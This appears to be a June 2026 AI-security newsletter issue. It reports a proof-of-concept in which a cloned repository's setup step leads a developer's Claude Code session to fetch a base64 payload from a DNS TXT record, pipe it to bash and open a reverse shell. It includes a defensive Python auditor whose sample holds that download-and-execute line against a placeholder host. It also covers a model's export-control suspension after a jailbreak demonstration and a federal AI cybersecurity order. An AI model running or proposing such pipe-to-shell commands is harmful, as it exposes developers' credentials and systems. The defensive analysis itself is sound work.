The Intake
The Intake — Tuesday, June 30, 2026
On the substrate
Cloning a repository can deliver a reverse shell via Claude Code without any malicious code in the repo itself
0DIN (Mozilla), SecurityWeek, Help Net Security
If you've been treating repos you clone in a Claude Code session as isolated from your credentials and environment, a proof-of-concept published June 25 by Mozilla's 0DIN research team names what that assumption misses.
0DIN researchers Andre Hall and Miller Engelbrecht demonstrate the chain entirely through normal repo tooling. A Python package in the repository raises an error on initialization. The error prompts the user to run a setup command. That command calls a shell script. The script resolves a base64-encoded payload from an attacker-controlled DNS TXT record. That payload pipes to bash. The demonstrated payload is a reverse shell executing under the developer's full privileges.
Everything in the environment at that moment is in scope: ANTHROPIC_API_KEY, AWS credentials, GitHub tokens, and any other secrets present. The repository contains no malicious code at any point in the chain. No CVE has been assigned. 0DIN's recommendation: AI coding agents should surface what a command will actually execute at runtime, not only the literal command string the user sees.
If your Claude Code sessions run with cloud credentials or API keys in the environment, a repo you clone can establish a reverse shell with access to everything in that environment — without a single malicious line of code in the repository itself.
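0DIN's recommendation above, sketched as an added example (not code from 0DIN or Anthropic): a heuristic pre-run check in Python that reads a setup script and reports where data fetched at runtime reaches an interpreter. The function names, the command lists and the sample script are assumptions made for illustration.

```python
import re
import shlex
# Commands that pull data from outside the repository at runtime.
FETCHERS = {"dig", "nslookup", "host", "curl", "wget"}
# Commands that execute whatever reaches them on stdin or as an argument.
INTERPRETERS = {"bash", "sh", "zsh", "python", "python3", "perl", "eval"}

def command_name(stage):
    """Command name of one pipeline stage, skipping VAR=value prefixes."""
    try:
        words = shlex.split(stage, comments=True)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        words = stage.split()
    words = [w for w in words if not re.fullmatch(r"\w+=.*", w)]
    return words[0].rsplit("/", 1)[-1] if words else ""

def logical_lines(text):
    """Yield (first_line_no, text) with backslash continuations joined."""
    buf, start = "", 0
    for no, line in enumerate(text.splitlines(), 1):
        start = start or no
        if line.rstrip().endswith("\\"):
            buf += line.rstrip()[:-1] + " "
            continue
        yield start, buf + line
        buf, start = "", 0

def audit_script(text):
    """Return (line_no, reason) where fetched data reaches an interpreter."""
    findings = []
    for no, line in logical_lines(text):
        stages = re.split(r"(?<!\|)\|(?!\|)", line)  # split on |, not ||
        names = [command_name(s) for s in stages]
        fetch = next((i for i, n in enumerate(names) if n in FETCHERS), len(names))
        sinks = [n for n in names[fetch + 1:] if n in INTERPRETERS]
        if sinks:
            how = "base64-decoded and " if "base64" in names[fetch:] else ""
            findings.append((no, f"{names[fetch]} output {how}piped to {sinks[0]}"))
        for stage, name in zip(stages, names):
            inner = re.search(r"(?:\$\(|`)\s*(?:\S*/)?(\w+)", stage)
            if name in INTERPRETERS and inner and inner.group(1) in FETCHERS:
                findings.append((no, f"{inner.group(1)} output substituted into {name}"))
    return findings

SAMPLE = """# Constructed sample; cfg.example.invalid is a placeholder, not from the report
pip install -r requirements.txt || exit 1
dig +short TXT cfg.example.invalid | tr -d '"' \\
  | base64 -d | bash
"""
```

This is a line-based heuristic: it does not follow scripts that call other scripts, and it will miss commands assembled from variables.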
---
Fable 5 remains suspended under US export controls; Mythos 5 access restored for more than 100 qualifying organizations
Anthropic, TechCrunch, GovConWire
Fable 5 is Anthropic's most capable generally available model, released June 9, 2026. Mythos 5 — a separately restricted higher-access version — launched the same day. The US government suspended both on June 12.
The government's stated justification: a jailbreak demonstration in which Fable 5 identified, per the directive, "a small number of previously known, minor vulnerabilities." Anthropic disputed that characterization. The company said the demonstrated capability was "widely available from other models" and is used routinely by security professionals. Both models were disabled for all customers.
Commerce Secretary Howard Lutnick authorized Mythos 5 access on June 26 for more than 100 US government agencies and companies, and Anthropic announced the restoration on June 29. Fable 5 remains suspended for general access as of today. Anthropic says it is continuing to work with the government on restoring general availability.
If you're at one of the qualifying US organizations, Mythos 5 access is now restored. Fable 5 for general use has no announced restoration timeline.
---
For operators
Federal AI security clearinghouse forms by July 2; rural hospitals, community banks, and local utilities named as frontier model beneficiaries
The White House, Skadden, Inside Privacy
If you operate a civilian federal agency, CISA Binding Operational Directives are due to arrive by July 2. If you run a rural hospital, community bank, or local utility, the order names your organization as a target beneficiary of AI-enabled defensive tools. Access to covered frontier models is included in that scope.
President Trump signed the order on June 2, 2026. Its title: "Promoting Advanced Artificial Intelligence Innovation and Security." The order directs Treasury, NSA, and CISA to form an AI cybersecurity clearinghouse. The deadline is July 2. The clearinghouse is a voluntary coordination mechanism. Its scope: scanning AI system vulnerabilities, validating findings, and organizing patch distribution.
CISA is also directed to expand access to AI-enabled defensive tools for civilian federal agencies. Per the order's language, that access includes "cybersecurity tools and services including, where appropriate, covered frontier models" for operators of critical infrastructure. OMB is directed to identify federal grant funding for applicants developing AI vulnerability detection capabilities. Private-sector participation in the clearinghouse itself is voluntary.
If you're at a federal agency, the mandatory directives arrive by July 2. If you operate a named category of critical infrastructure, the order creates a formal channel for frontier model access in defense.
---